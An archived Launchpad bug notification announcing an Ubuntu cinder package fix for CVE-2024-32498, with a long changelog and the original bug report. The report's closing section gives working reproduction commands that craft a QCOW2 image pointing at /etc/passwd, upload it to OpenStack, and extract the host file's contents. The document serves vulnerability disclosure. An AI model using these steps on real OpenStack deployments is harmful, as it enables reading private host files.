yahoo-eng-team team mailing list archive

Thread
Date
[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: James Page <2059809@xxxxxxxxxxxxxxxxxx>
Date: Mon, 08 Jul 2024 13:05:28 -0000
Reply-to: Bug 2059809 <2059809@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
This bug was fixed in the package cinder - 2:20.3.1-0ubuntu1.4~cloud0
---------------

 cinder (2:20.3.1-0ubuntu1.4~cloud0) focal; urgency=medium
 .
   * SECURITY UPDATE for Ubuntu Cloud Archive. backport to focal.
 .
 cinder (2:20.3.1-0ubuntu1.4) jammy-security; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498.patch: check for external qcow2 data
       file.
     - debian/control: added qemu-utils to Build-Depends so qemu-img is
       available for new tests.
     - CVE-2024-32498
 .
 cinder (2:20.3.1-0ubuntu1.2) jammy; urgency=medium
 .
   [ Jorge Merlino ]
   * Increase size of volume image metadata values to 65535 bytes
     (LP: #1988942)
 .
   [ Heather Lemon ]
   * Start cinder-volume.service after tgt.service started (LP: #1987663)
     - d/cinder-volume.service.conf: drop-in with 'After=' and 'Wants='
       ('Wants=' is not generated by pkgos-gen-systemd-unit currently).
     - d/cinder-volume.install: ship the systemd service drop-in file.
 .
   [ Seyeong Kim ]
   * HPE3PAR: Failing to clone a volume having children (LP: #1994521):
     - d/p/0001-HPE-3PAR-Fix-umanaged-volumes-snapshots-missing.patch
     - d/p/0002-3PAR-Error-out-if-vol-cannot-be-converted-to-base.patch
     - api 4.0.17 is added as it is in the middle of the main patch
       (4.0.18)
 .
 cinder (2:20.3.1-0ubuntu1.1) jammy; urgency=medium
 .
   * Revert driver assisted volume retype (LP: #2019190):
     - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch
 .
 cinder (2:20.3.1-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2037332).
 .
 cinder (2:20.3.0-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2025503).
   * d/p/CVE-2023-2088.patch: Dropped. Fixed in point release.
 .
 cinder (2:20.2.0-0ubuntu1.1) jammy-security; urgency=medium
 .
   * SECURITY UPDATE: Unauthorized File Access (LP: #2021980)
     - debian/patches/CVE-2023-2088.patch: Reject unsafe delete
       attachment calls.
     - CVE-2023-2088
 .
 cinder (2:20.2.0-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2019759).
   * d/p/lp1945500.patch: Dropped. Fixed in stable point release.
 .
 cinder (2:20.1.0-0ubuntu2.2) jammy-security; urgency=medium
 .
   * SECURITY REGRESSION: Regressions in other projects (LP: #2020111)
     - debian/patches/series: Do not apply CVE-2023-2088.patch until
       patches are ready for all upstream OpenStack projects.
     - CVE-2023-2088
 .
 cinder (2:20.1.0-0ubuntu2.1) jammy-security; urgency=medium
 .
   * SECURITY UPDATE: Unauthorized File Access
     - debian/patches/CVE-2023-2088.patch: Reject unsafe delete
       attachment calls.
     - CVE-2023-2088
 .
 cinder (2:20.1.0-0ubuntu2) jammy; urgency=medium
 .
   * d/p/lp1945500.patch: Filter reserved image properties (LP: #1945500).
 .
 cinder (2:20.1.0-0ubuntu1) jammy; urgency=medium
 .
   * New stable point release for OpenStack Yoga (LP: #2004030).
 .
 cinder (2:20.0.1-0ubuntu1) jammy; urgency=medium
 .
   * d/gbp.conf: Create stable/yoga branch.
   * New stable point release for OpenStack Yoga (LP: #1985084).
 .
 cinder (2:20.0.0-0ubuntu1) jammy; urgency=medium
 .
   * d/watch: Scope to 20.x.
   * New upstream release for OpenStack Yoga.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:19.0.0+git2022030310.b49fb59a6-0ubuntu2) jammy; urgency=medium
 .
   * d/p/fix-qos-computation.patch: Cherry-pick from upstream review to
     fix TypeError exception when generating QOS feature name (LP: #1948507).
 .
 cinder (2:19.0.0+git2022030310.b49fb59a6-0ubuntu1) jammy; urgency=medium
 .
   * New upstream snapshot for OpenStack Yoga.
 .
 cinder (2:19.0.0+git2022011215.23494a6d6-0ubuntu1) jammy; urgency=medium
 .
   * New upstream snapshot for OpenStack Yoga.
   * d/control, d/rules: Bump debhelper compat to 13.
 .
 cinder (2:19.0.0+git2021120811.e5ef39604-0ubuntu2) jammy; urgency=medium
 .
   * d/t/control: Add allow-stderr restriction to prevent autopkgtest failure
     when SQLAlchemy issues a warning.
 .
 cinder (2:19.0.0+git2021120811.e5ef39604-0ubuntu1) jammy; urgency=medium
 .
   * New upstream snapshot for OpenStack Yoga.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:19.0.0-0ubuntu2) impish; urgency=medium
 .
   * d/py3dist-overrides: Add SQLAlchemy to ensure d/control is not overridden.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:19.0.0-0ubuntu1) impish; urgency=medium
 .
   * d/watch: Scope to 19.x.
   * New upstream release for OpenStack Xena.
 .
 cinder (2:19.0.0~b1+git2021091409.768b8996b-0ubuntu1) impish; urgency=medium
 .
   * New upstream snapshot for OpenStack Xena.
 .
 cinder (2:18.0.0+git2021072116.81f2aaeea-0ubuntu1) impish; urgency=medium
 .
   * New upstream snapshot for OpenStack Xena.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:18.0.0+git2021061414.d5f0e5187-0ubuntu1) impish; urgency=medium
 .
   * New upstream snapshot for OpenStack Xena.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:18.0.0-0ubuntu3) hirsute; urgency=medium
 .
   * d/p/skip-victoria-failures.patch: Restored and rebased. This is still
     necessary for Launchpad builds.
 .
 cinder (2:18.0.0-0ubuntu2) hirsute; urgency=medium
 .
   * d/p/skip-victoria-failures.patch: Dropped. Fixed upstream.
   * d/p/add-mock-psutil-in-quobyte-tests.patch: Dropped. Fixed upstream.
 .
 cinder (2:18.0.0-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream release for OpenStack Wallaby.
 .
 cinder (2:18.0.0~b1-0ubuntu2) hirsute; urgency=medium
 .
   * d/py3dist-overrides: Add boto3 which is a Suggests.
 .
 cinder (2:18.0.0~b1-0ubuntu1) hirsute; urgency=medium
 .
   * d/watch: Track 18.x series.
   * New upstream milestone for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/skip-moto-tests.patch: Skip test dependency that is not yet
     packaged in Ubuntu and was added late in cycle.
   * d/p/patch-botocore-exceptions.patch: Account for changes to botocore
     vendored exceptions.
 .
 cinder (2:17.0.1+git2021012507.d26092348-0ubuntu3) hirsute; urgency=medium
 .
   * d/*: Remove tgt in favor of targetcli-fb.
 .
 cinder (2:17.0.1+git2021012507.d26092348-0ubuntu2) hirsute; urgency=medium
 .
   * d/p/add-mock-psutil-in-quobyte-tests.patch: Add a mock of psutil
     disk_partitions to fix failing unit test (LP: #1913607).
 .
 cinder (2:17.0.1+git2021012507.d26092348-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream snapshot for OpenStack Wallaby.
 .
 cinder (2:17.0.1+git2021010614.a9c922ab7-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream snapshot for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:17.0.1+git2020120911.d3ffa90ba-0ubuntu1) hirsute; urgency=medium
 .
   * New upstream snapshot for OpenStack Wallaby.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:17.0.0-0ubuntu1) groovy; urgency=medium
 .
   * New upstream release for OpenStack Victoria.
 .
 cinder (2:17.0.0~rc2-0ubuntu1) groovy; urgency=medium
 .
   * d/control: Update VCS paths for move to lp:~ubuntu-openstack-dev.
   * d/watch: Track 17.x series.
   * New upstream release candidate for OpenStack Victoria.
   * d/control: Align (Build-)Depends with upstream.
 .
 cinder (2:17.0.0~b3~git2020091007.afcaf0b9d-0ubuntu3) groovy; urgency=medium
 .
   * d/py3dist-overrides: Add python3-zstd to py3dist-overrides.
 .
 cinder (2:17.0.0~b3~git2020091007.afcaf0b9d-0ubuntu2) groovy; urgency=medium
 .
   * d/p/skip-victoria-failures.patch: Restored to skip failing unit tests.
 .
 cinder (2:17.0.0~b3~git2020091007.afcaf0b9d-0ubuntu1) groovy; urgency=medium
 .
   * d/control: Remove Breaks/Replaces that are older than Focal (LP: #1878419).
   * New upstream snapshot for OpenStack Victoria.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/*: Removed. Changes landed upstream and tests fixed.
   * d/control: Add new python3-zstd package to depends.
 .
 cinder (2:17.0.0~b2~git2020073012.2124f39f9-0ubuntu1) groovy; urgency=medium
 .
   * New upstream snapshot for OpenStack Victoria.
   * d/p/*: Refreshed.
 .
 cinder (2:17.0.0~b1~git2020062409.85fcf1057-0ubuntu1) groovy; urgency=medium
 .
   * SECURITY UPDATE: Dell EMC ScaleIO/VxFlex OS Backend Credentials Exposure
     (LP: #1823200)
     - Remove VxFlex OS credentials from connection_properties. Passwords are
       now stored in separate file and are retrieved during each attach/detach
       operation. Cinder is patched in 16.1.0 stable point release.
     - d/control: Align (Build-)Depends with min version of python3-os-brick
       required to fix credential exposure.
     - CVE-2020-10755
   * New upstream snapshot for OpenStack Victoria.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/py38skip.patch: Dropped. No longer needed.
   * d/p/skip-victoria-failures.patch: Rebased and updated with upstream bug.


** Changed in: cloud-archive/yoga
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  Fix Released
Status in Ubuntu Cloud Archive:
  Fix Released
Status in Ubuntu Cloud Archive antelope series:
  Fix Released
Status in Ubuntu Cloud Archive bobcat series:
  Fix Released
Status in Ubuntu Cloud Archive caracal series:
  Fix Released
Status in Ubuntu Cloud Archive ussuri series:
  Fix Committed
Status in Ubuntu Cloud Archive yoga series:
  Fix Released
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions